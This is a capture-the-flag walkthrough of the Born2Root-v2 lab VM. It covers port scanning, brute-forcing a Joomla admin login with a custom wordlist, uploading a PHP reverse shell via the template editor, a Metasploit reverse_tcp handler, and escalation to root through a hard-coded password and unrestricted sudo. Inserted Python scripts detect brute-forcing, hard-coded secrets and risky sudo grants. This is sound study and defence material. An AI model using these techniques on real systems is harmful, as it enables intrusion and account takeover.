Born2Root-v2 Walkthrough

Description

I decided to solve this box, although it’s not really new. The creator of this box didn’t give a proper description, but I suppose the goal is to get root and acquire the flag. I think the difficulty of the box is between beginner and intermediate level.

Scanning

I started with the usual nmap scan. Here is the output of the scan:

root :: ~ » nmap -A -p- 192.168.1.148
Nmap scan report for born2root (192.168.1.148)
Host is up (0.00082s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Welcome to my website
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          41869/udp  status
|_  100024  1          59562/tcp  status
59562/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I started exploring the web server further with nikto and gobuster. It turned out there is a Joomla installation under the joomla directory.

root :: wordlists/web » gobuster -u 192.168.1.148 -w common.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.148/
[+] Threads      : 10
[+] Wordlist     : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/27 16:41:34 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/js (Status: 301)
/joomla (Status: 301)
/LICENSE (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)
/vendor (Status: 301)
=====================================================
2019/05/27 16:41:36 Finished
=====================================================
root :: wordlists/web »

Generating a custom wordlist

It looked interesting, and I scanned it with a few tools, searched for exploits, etc., but had no luck. I had a feeling that this must be the way in, so I fired up cewl to generate a custom wordlist based on the site. Maybe I would be successful with a brute-force attack on the administrator page.

root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://192.168.1.148/joomla
CeWL 5.4.5 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root :: /opt/cewl » cd
root :: ~ » cd Downloads
root :: ~/Downloads » wc -c passwords.txt
 787 passwords.txt

Well, the script generated 787 possible passwords, which was good enough for me. I navigated to the administrator page, enabled the Burp proxy and started Burp Suite.

I captured the login request and sent it to the Intruder. I cleared the auto-selected payload positions except for the password position.

Then I loaded the previously created wordlist as a simple list and started the attack.

It took a couple of minutes, but it was worth it. I sorted the results by status code, so I could easily see the 200 HTTP responses. I chose one and I was able to successfully log in.
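From the defender's side, a wordlist attack like the one above leaves a very recognisable trace in the Apache access log: one source address posting to the Joomla administrator login handler many times inside a short window. The script below is an added example, not part of the original walkthrough. It parses combined-format access log lines and flags any client whose login POSTs exceed a threshold inside a sliding time window. The sample log lines are constructed, and the login path /joomla/administrator/index.php, the threshold and the window size are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Joomla's administrator login handler (assumed path, matching the /joomla install above).
LOGIN_PATH = "/joomla/administrator/index.php"


def parse_line(line):
    """Return a dict with ip/ts/method/path/status, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, threshold=10, window_s=60):
    """Map source IP -> peak number of login POSTs inside any window_s-second
    window, for IPs that reach `threshold` (defaults are illustrative)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith(LOGIN_PATH):
            per_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        lo, peak = 0, 0
        for hi in range(len(stamps)):        # sliding window over sorted timestamps
            while (stamps[hi] - stamps[lo]).total_seconds() > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, ts, method, path, status):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample log: one ordinary visitor and one host hammering the login form.
SAMPLE_LOG = [
    _line("192.168.1.50", "28/May/2019:14:59:01 +0200", "GET", "/joomla/", 200),
    _line("192.168.1.50", "28/May/2019:14:59:20 +0200", "POST", LOGIN_PATH, 303),
] + [
    _line("192.168.1.117", f"28/May/2019:15:00:{sec:02d} +0200", "POST", LOGIN_PATH, 200)
    for sec in range(0, 30, 2)               # 15 POSTs, two seconds apart
]

if __name__ == "__main__":
    for ip, count in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} login POSTs inside a 60 s window")
```

The same logic, pointed at the real log and paired with a lockout or rate limit on the administrator login, is what turns the "couple of minutes" above into an alert instead of a foothold.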

Getting access

My first thought was to upload a reverse shell, which is pretty easy at this point. I clicked on the Templates menu and selected the default Protostar template. You can upload any kind of file, but I uploaded my PHP reverse shell and executed it by navigating to: /joomla/templates/protostar/shell.php

Before doing that I set up my handler using Metasploit. After I got a connection back, I started poking around and looking for privilege escalation vectors.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.117
lhost => 192.168.1.117
msf5 exploit(multi/handler) > set lport 9898
lport => 9898
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.117:9898
[*] Sending stage (38247 bytes) to 192.168.1.148
[*] Meterpreter session 1 opened (192.168.1.117:9898 -> 192.168.1.148:50447) at 2019-05-28 15:01:24 +0200

meterpreter > sysinfo
Computer    : born2root
OS          : Linux born2root 3.16.0-6-586 #1 Debian 3.16.56-1 (2018-04-28) i686
Meterpreter : php/linux

Finding a critical file

In the /opt folder, I found an interesting python script, which contained a password.

#!/usr/bin/env python
# Python 2 backup script as found in /opt on the box, with its indentation restored.
import sys, paramiko

if len(sys.argv) < 5:
    print "args missing"
    sys.exit(1)

hostname = "localhost"
password = "lulzlol"          # hard-coded SFTP password, readable from the www-data shell
source = "/var/www/html/joomla"
dest = "/tmp/backup/joomla"

username = "tim"
port = 22

try:
    t = paramiko.Transport((hostname, port))
    t.connect(username=username, password=password)
    sftp = paramiko.SFTPClient.from_transport(t)
    sftp.get(source, dest)

finally:
    t.close()
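The weakness here is not paramiko but a credential written into a script that any local account can read. Below is an added example, not from the original walkthrough, of the kind of check a host-hardening job can run to catch exactly this: it walks a directory for script files, flags assignment-style credential literals, and records whether the file is world-readable. The sample tree is constructed in a temporary directory, and the regex is an assumed heuristic rather than a complete secret-scanning ruleset.

```python
import os
import re
import stat
import tempfile

# Heuristic for assignment-style credentials: password = "..."  /  token: '...'
# (an assumed pattern for illustration, not an exhaustive secret-scanning ruleset).
SECRET_RE = re.compile(
    r'\b(password|passwd|pwd|secret|api_key|token)\b\s*[:=]\s*["\']([^"\']{4,})["\']',
    re.IGNORECASE,
)
SCRIPT_EXTS = {".py", ".sh", ".rb", ".pl", ".php"}


def scan_file(path):
    """Return one finding per credential-looking assignment in `path`.
    The matched value is never stored; only its length is reported."""
    findings = []
    mode = os.stat(path).st_mode
    with open(path, "r", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            m = SECRET_RE.search(line)
            if m:
                findings.append({
                    "file": path,
                    "line": lineno,
                    "key": m.group(1).lower(),
                    "value_len": len(m.group(2)),
                    # Any local user can read it, as with the script in /opt above.
                    "world_readable": bool(mode & stat.S_IROTH),
                })
    return findings


def scan_tree(root):
    """Walk `root` and scan every file with a script-like extension."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1] in SCRIPT_EXTS:
                out.extend(scan_file(os.path.join(dirpath, name)))
    return out


def build_sample_tree():
    """Construct a small tree for the demo: a world-readable backup script with a
    hard-coded SFTP password, and a script that reads its secret from a protected file."""
    root = tempfile.mkdtemp(prefix="scan_demo_")
    leaky = os.path.join(root, "backup.py")
    with open(leaky, "w") as fh:
        fh.write('import paramiko\nhostname = "localhost"\npassword = "constructed-sample"\n')
    os.chmod(leaky, 0o644)                        # readable by every local user
    clean = os.path.join(root, "rotate.sh")
    with open(clean, "w") as fh:
        fh.write('#!/bin/sh\nread -r PASSWORD < /etc/backup/secret\n')
    os.chmod(clean, 0o700)                        # owner only
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        flag = "WORLD-READABLE" if f["world_readable"] else "restricted"
        print(f'{f["file"]}:{f["line"]}: {f["key"]} literal ({f["value_len"]} chars), {flag}')
```

The second sample script shows the cheap fix: keep the secret in a separately permissioned file (or use key-based SSH authentication) so that a web-shell user reading /opt learns nothing.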

Privilege escalation

I upgraded my shell with python so that I could switch user and use this password to log in as tim. By the way, he used the same password for SSH access, and it’s easier to work with a fully functional shell, but here I worked my way through with the simple netcat reverse shell.

python -c "import pty;pty.spawn('/bin/bash')"
www-data@born2root:/var/www/html/joomla/templates/protostar$ su tim
Password: lulzlol
tim@born2root:/var/www/html/joomla/templates/protostar$ sudo -l
[sudo] password for tim: lulzlol

Matching Defaults entries for tim on born2root:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tim may run the following commands on born2root:
    (ALL : ALL) ALL
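The `(ALL : ALL) ALL` line is the whole privilege escalation: any account that knows tim's password owns the box. Reviewing `sudo -l` output (or the sudoers files it comes from) for grants like this is routine in a build review, and the script below is an added example, not from the original walkthrough, of automating it. It parses the grant block, then ranks rules that give unrestricted root, passwordless root commands, or unrestricted commands as another user. The sample output repeats the block above and adds two constructed rules for contrast.

```python
import re

# One grant line as printed by `sudo -l`: "(runas[ : group]) [TAG: ...] cmd[, cmd...]"
RULE_RE = re.compile(r'^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

# Constructed sample: the grant from the walkthrough plus two made-up rules for contrast.
SAMPLE_SUDO_L = r"""Matching Defaults entries for tim on born2root:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tim may run the following commands on born2root:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (www-data) /bin/cat /var/log/apache2/access.log
"""


def parse_sudo_l(text):
    """Return the grant rules from `sudo -l` output as dicts of runas / tags / cmds."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if re.match(r"^User \S+ may run the following commands on ", line):
            in_rules = True          # everything after this header is a grant
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").replace(" ", ""),
            "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit(rules):
    """Rank each grant; unrestricted root is what lets tim go straight to a root shell."""
    findings = []
    for r in rules:
        runas_user = r["runas"].split(":")[0]
        as_root = runas_user in ("ALL", "root")
        if as_root and "ALL" in r["cmds"]:
            findings.append(("CRITICAL", "any command as root", r))
        elif as_root and "NOPASSWD" in r["tags"]:
            findings.append(("HIGH", "root command without a password", r))
        elif "ALL" in r["cmds"]:
            findings.append(("MEDIUM", f"any command as {runas_user}", r))
    return findings


if __name__ == "__main__":
    for sev, why, rule in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{sev}: {why}: ({rule['runas']}) {' '.join(rule['tags'])} {', '.join(rule['cmds'])}")
```

On a real host the input would be the output of `sudo -l -U <user>` for each account that can log in, so the password reuse between the backup script and tim's shell account shows up as a critical finding rather than a flag.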

Switching to root

As you can see, tim can run everything as root without needing the root password. Let’s switch to root!

tim@born2root:/var/www/html/joomla/templates/protostar$ sudo su
root@born2root:/var/www/html/joomla/templates/protostar# cd /root
root@born2root:~# ls
flag.txt

Finally, I printed out the one and only flag in the /root directory.

root@born2root:~# cat flag.txt

            .andAHHAbnn.
        .aAHHHAAUUAAHHHAn.
        dHP^~"        "~^THb.
    .   .AHF                YHA.   .
    |  .AHHb.              .dHHA.  |
    |  HHAUAAHAbn      adAHAAUAHA  |
    I  HF~"_____        ____ ]HHH  I
HHI HAPK""~^YUHb  dAHHHHHHHHHH IHH
HHI HHHD> .andHH  HHUUP^~YHHHH IHH
YUI ]HHP     "~Y  P~"     THH[ IUP
    "  `HK                   ]HH'  "
        THAn.  .d.aAAn.b.  .dHHP
        ]HHHHAAUP" ~~ "YUAAHHHH[
        `HHP^~"  .annn.  "~^YHH'
        YHb    ~" "" "~    dHF
        "YAb..abdHHbndbndAP"
        THHAAb.  .adAHHF
            "UHHHHHHHHHHU"
            ]HHUUHHHHHH[
            .adHHb "HHHHHbn.
    ..andAAHHHHHHb.AHHHHHHHAAbnn..
.ndAAHHHHHHUUHHHHHHHHHHUP^~"~^YUHHHAAbn.
"~^YUHHP"   "~^YUHHUP"        "^YUP^"
    ""         "~~"


W00t w00t ! If you are reading this text  then Congratulations !!

I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm .

If you want to try more boxes like this created by me, try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net !
Until we meet again :-)

root@born2root:~#

Before you go

If you found this article helpful, please share it to help others with similar interests find it! Feedback and donations are always welcome!